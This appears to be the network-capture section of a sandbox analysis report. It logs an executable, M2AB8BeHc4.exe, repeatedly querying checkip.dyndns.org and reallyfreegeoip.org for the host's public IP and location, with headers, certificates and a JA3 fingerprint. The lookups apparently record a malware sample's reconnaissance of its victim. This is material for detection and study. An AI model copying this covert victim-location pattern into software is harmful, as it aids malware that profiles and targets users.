Oct 29, 2024 10:16:08.601571083 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:16:08 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 14b5938aa706eb659b15f25a61300997 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>
Oct 29, 2024 10:16:09.759854078 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 29, 2024 10:16:09.942194939 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:16:09 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: da3090af6aed390b7f91cd488d30e2b4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	158.101.44.242	80	2720	C:\Users\user\Desktop\M2AB8BeHc4.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:16:10.986588001 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	158.101.44.242	80	2720	C:\Users\user\Desktop\M2AB8BeHc4.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:16:11.000451088 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	158.101.44.242	80	2720	C:\Users\user\Desktop\M2AB8BeHc4.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:16:11.030241966 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 29, 2024 10:16:11.703902960 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:16:11 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c1304170295bed2b09af3106e1c8ee4b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	158.101.44.242	80	2720	C:\Users\user\Desktop\M2AB8BeHc4.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:16:12.476404905 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 29, 2024 10:16:13.119854927 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:16:13 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 64ddbfba891dc7235a0e0d1bb3808722 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49745	158.101.44.242	80	2720	C:\Users\user\Desktop\M2AB8BeHc4.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:16:13.891400099 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 29, 2024 10:16:14.668852091 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:16:14 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3de3ea9824c1f04023672ca8c4d0210a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49747	158.101.44.242	80	2720	C:\Users\user\Desktop\M2AB8BeHc4.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:16:15.463066101 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 29, 2024 10:16:16.395612001 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:16:16 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ce9f451867f3fcd408ecb28c41dd976b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49749	158.101.44.242	80	2720	C:\Users\user\Desktop\M2AB8BeHc4.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:16:17.161813974 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 29, 2024 10:16:18.344528913 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:16:18 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d2196383e5fecad0066974ccacb11223 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49751	158.101.44.242	80	2720	C:\Users\user\Desktop\M2AB8BeHc4.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:16:19.228502035 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 29, 2024 10:16:20.390041113 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:16:20 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 76cf230db49cbb1f725446237799fd57 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>

HTTPS Connections

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Oct 29, 2024 10:16:18.952027082 CET	188.114.97.3	443	192.168.2.4	49750	CN=reallyfreegeoip.org CN=WE1, O=Google Trust Services, C=US CN=GTS Root R4, O=Google Trust Services LLC, C=US	CN=WE1, O=Google Trust Services, C=US CN=GTS Root R4, O=Google Trust Services LLC, C=US CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE	Mon Sep 02 00:57:39 CEST 2024 Wed Dec 13 10:00:00 CET 2023 Wed Nov 15 04:43:21 CET 2023	Sat Nov 30 23:57:38 CET 2024 Tue Feb 20 15:00:00 CET 2029 Fri Jan 28 01:00:42 CET 2028	769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0	54328bd36c14bd82ddaa0c04b25ed9ad
					CN=WE1, O=Google Trust Services, C=US	CN=GTS Root R4, O=Google Trust Services LLC, C=US	Wed Dec 13 10:00:00 CET 2023	Tue Feb 20 15:00:00 CET 2029
					CN=GTS Root R4, O=Google Trust Services LLC, C=US	CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE	Wed Nov 15 04:43:21 CET 2023	Fri Jan 28 01:00:42 CET 2028

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	188.114.97.3	443	2720	C:\Users\user\Desktop\M2AB8BeHc4.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:16:09 UTC	87	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-29 09:16:09 UTC	881	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:16:09 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 879 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PNd98I9e%2BlndrVBWoDl3ejcfisqaHNhTEEsNVRKAWOnFJZQtpHHL7kRmRbTpr1piTvShKsk2GDn2ovooAMwERXQXiN5pECZ8cUD5QBwCvQCrZXlae3ut5%2FLENemq8kquDqOdJcFM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da210b03afb6b6d-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1877&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1572204&cwnd=251&unsent_bytes=0&cid=788e1f31c9d012c2&ts=348&x=0"
2024-10-29 09:16:09 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	188.114.97.3	443	2720	C:\Users\user\Desktop\M2AB8BeHc4.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:16:10 UTC	63	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-29 09:16:10 UTC	892	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:16:10 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 880 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5L4j8x%2F2uvizTf9UB34T%2FtIGtS1TrP32MSHb3f7gJ%2Bgwy5%2F3BdDJAT2LVGFaFWgZ01oblPZTWSZD5Bnc%2BRauNR3ff04hbt6vGndM28Iekn2dkXSs7O6RGqjmg%2F%2F%2BBRFZjEVeEZx8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da210b71e9d4782-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=943&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2878727&cwnd=242&unsent_bytes=0&cid=f92409f07f53b92f&ts=150&x=0"
2024-10-29 09:16:10 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49742	188.114.97.3	443	2720	C:\Users\user\Desktop\M2AB8BeHc4.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:16:12 UTC	63	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-29 09:16:12 UTC	883	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:16:12 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 882 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u5N0eTm%2BqCSXR1DU0oH49Bl%2BARfi9bpb8aIaoK8Z5RkZcgsNalrZwGqA6SmOvrj4OKXbYDwd9gLVVJlVwWDpqA7muikNFEl089ME20rCWucoAmGWGt6n4G8%2B7t5hAkeKwcW46Xty"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da210c16d5e83a1-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1534&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1868387&cwnd=251&unsent_bytes=0&cid=0f01f903241f26a2&ts=156&x=0"
2024-10-29 09:16:12 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49744	188.114.97.3	443	2720	C:\Users\user\Desktop\M2AB8BeHc4.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:16:13 UTC	63	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-29 09:16:13 UTC	887	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:16:13 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 883 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OAvieB8a5ZBoAD3GFEX9IYL%2BE0AF%2BiaZph1asJtoJKkY8%2Fu5X1vKyGMZqIAQ92lal8yjxA6qgRKRQZY3YXbs1NSV7b4GqKFNxv5Tp0WU4J39w%2FWoQE5utw%2FhVIKtaZ7tJftyI8NZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da210ca49d92e72-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1359&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2078966&cwnd=219&unsent_bytes=0&cid=7da84a797d575c34&ts=148&x=0"
2024-10-29 09:16:13 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49746	188.114.97.3	443	2720	C:\Users\user\Desktop\M2AB8BeHc4.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:16:15 UTC	63	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-29 09:16:15 UTC	881	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:16:15 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 885 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IQGpyQuWV3U4QdncWY8wBcwivPyVYZXqVpq3fNGanvX30ViGq9DjorAhjjNk46yAHHhg6XCSsURddCL8Q7wd07U3uRZJ2mj3gbH0%2FmCR5Fz7Z7w%2BAVkOTc7D32uKiBqIvw9441Y2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da210d41b436b45-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1257&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2244961&cwnd=251&unsent_bytes=0&cid=27f71650c1cc9ef3&ts=179&x=0"
2024-10-29 09:16:15 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49748	188.114.97.3	443	2720	C:\Users\user\Desktop\M2AB8BeHc4.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:16:17 UTC	63	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-29 09:16:17 UTC	889	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:16:17 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 887 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m8jOUTbk5ZslaaB3mHmA5P2MleM%2BYj8AAfUlsI5%2BPE5pBsWN%2BRx%2F7atc8WoBVlc3fotilibVY%2Fh52r3Iw%2FkaKq2wYa2QKW0OkeWWpqNrBxbC14o1UJdQl8zwxKCJFrQGz3CV2ApV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da210debdaa2d2b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1128&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2500863&cwnd=251&unsent_bytes=0&cid=da3c7ff0b0e53997&ts=145&x=0"
